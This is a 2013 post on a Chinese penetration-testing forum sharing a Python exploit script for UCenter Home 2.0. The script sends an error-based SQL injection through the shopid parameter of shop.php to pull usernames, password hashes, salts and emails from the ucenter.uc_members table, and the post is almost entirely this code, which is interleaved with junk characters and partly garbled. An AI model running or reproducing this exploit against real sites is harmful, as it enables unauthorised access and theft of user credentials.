找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1951|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
$ x2 v5 _( {# f# l& U2 J6 M1 m , ~6 u  a; E. `& i! ^- J
$ x% V6 @* E6 L( x  p% E, {/ d0 }5 e
#!/usr/bin/env python  
! ^& D% A. Q; y4 W4 F$ [9 Y
5 `  D1 u1 G7 c* p  o4 R# |3 Ximport sys  6 U' \7 r0 [  u: W" N
import urllib2  ) E# X; p* H. J2 K; O) ~. t
import re  
0 m; [% _1 H# S& d
! i; l% x; e" P1 ]0 {! J7 Qdef info():  
# f4 d+ V5 ^7 F. a    print 'From:http://www.exploit-db.com/exploits/14997/' 1 `2 V  N3 ^6 s4 i0 A5 m6 [% S, a
    print 'http://www.hake.cc/Web_loudong/'
9 e& E' y- g  V% X4 D; |" o    print 'changed:qiaoy'  ; Z2 G1 L! _3 }1 O3 `7 E- `
    print 'exp:'  * n4 \  l- d& B9 _' F' r- F
    print ' ./UCenter_Home_2.0.py site'  
- T$ R0 e, g& ]) l: |; Y . s. Y1 y& {6 V; y+ W8 A* W
def main():  + a) o$ L6 V$ `* N) z1 S# S' l
    if len(sys.argv) != 2:  
, E4 c  {9 x5 @7 S        info()  
+ {: L0 K8 m# \6 j    else:  9 j8 X6 A% t) s, \4 R9 L
        site = sys.argv[1]  
# p& \9 z2 C+ w5 w        if site[0:7] == 'http://':  
% l$ P  \% i# I5 c1 E) P- H3 e            sitesite =site  . H% D2 g5 m, o% b
        elif site[0:8] == 'https://':  ) J/ h. n; p3 O7 V; o# O- F
            sitesite = site  ) J2 c4 _3 `# s4 X' n+ v
        else:  
1 U+ j) z5 w% U  e5 q4 B' z8 I            site = 'http://'+site  % A3 K( N, c  E
        try:  
6 x$ u0 Y; U  }/ J            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
& W: O( e% C1 q' p: `# J# a$ O+ i            Value = urllib2.urlopen(url).read()  
( {5 D1 S# L/ b9 M2 `            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
& I+ X6 f  `& Q; u$ q            hacked = Msg.split(':')  0 `  d% [3 x! h
            print 'Name:    '+hacked[1]  - V6 F! `. c2 u" R8 H6 q; e
            print 'Passwd:  '+hacked[2]  ! ^% ^8 {9 B+ E( }2 k3 z8 ^4 x
            print 'salt:    '+hacked[3]  
9 Z' X6 k) R0 Z- \: G: |            print 'email:   '+hacked[4]  
0 }! b5 Y* B" b/ J        except:  3 ^' ~! t9 g$ L  L. P( K
            print 'Sorry,I can\'t work............'  9 W/ P0 R3 s: i

( t& J8 P% @9 W5 z, Jif __name__ == '__main__':  6 ^, w6 A2 B3 E% f) I+ Q
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表